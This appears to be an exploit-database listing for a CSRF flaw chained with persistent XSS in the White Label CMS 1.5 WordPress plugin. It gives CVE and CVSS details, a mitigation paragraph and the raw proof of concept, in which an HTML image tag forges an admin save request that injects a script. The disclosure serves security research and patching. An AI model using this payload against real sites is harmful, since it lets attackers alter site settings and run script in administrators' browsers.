header-logo
Suggest Exploit
vendor:
White Label CMS
by:
pcsjj
8,8
CVSS
HIGH
Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS)
352 (Cross-Site Request Forgery (CSRF)) and 79 (Cross-Site Scripting (XSS))
CWE
Product Name: White Label CMS
Affected Version From: 1.5
Affected Version To: 1.5
Patch Exists: YES
Related CWE: CVE-2012-5387 (CSRF), CVE-2012-5388 (XSS)
CPE: a:videousermanuals:white_label_cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: WordPress
2012

White Label CMS v 1.5 CSRF w/ persistent XSS

This exploit uses a CSRF vulnerability to inject a persistent XSS payload into the White Label CMS v 1.5 plugin. The exploit code creates an HTML page with an image tag that contains a malicious script. When the page is loaded, the script is executed and the XSS payload is injected into the plugin.

Mitigation:

Developers should ensure that user input is properly sanitized and validated to prevent malicious code from being injected into the application. Additionally, developers should ensure that CSRF protection is implemented to prevent malicious requests from being executed.
Source

Exploit-DB raw data:

# Exploit Title: White Label CMS v 1.5 CSRF w/ persistent XSS
# Date: 21/10/2012
# Exploit Author: pcsjj
# Vendor Homepage: http://www.videousermanuals.com/white-label-cms/
# Version: 1.5
# Software Link: http://plugins.svn.wordpress.org/white-label-cms/branches/
# Downloads: 110,313
# CVE : CVE-2012-5387 (CSRF), CVE-2012-5388 (XSS)

<html>
<title>White Label CMS CSRF</title>
<body>
<img src='http://[TARGET]/wordpress/wp-admin/admin.php?page=wlcms-plugin.php&action=save&wlcms_o_developer_name="><script>alert("fun")</script><div
"'>
</body>
</html>

Navigation

Suggest Exploit

Services By CQR